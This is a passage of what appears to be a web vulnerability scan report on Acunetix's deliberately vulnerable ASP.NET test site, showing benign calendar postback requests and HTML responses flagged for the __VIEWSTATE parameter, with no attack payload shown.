href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:White" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8141&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAA0ww8H9oIZGRkUL3tezJZQJ4VeIUBQ43uD3026n0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKF%2FN64CQKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDHgINEm0IwbaKU8j88EPirUN99JT
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:06 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAA0ww8H9oIZGRkUL3tezJZQJ4VeIUBQ43uD3026n0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKF/N64CQKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDHgINEm0IwbaKU8j88EPirUN99JT" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:White" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8129&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAA3g%2FOFdoIZGRkmHaSD7xMoZW8VoLV4g8813xb9uY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLl9O6PDwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDC%2BSJq2TM%2FOmlazIh%2FuxnpLL33u%2F
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:11 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAA3g/OFdoIZGRkmHaSD7xMoZW8VoLV4g8813xb9uY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLl9O6PDwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDC+SJq2TM/OmlazIh/uxnpLL33u/" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 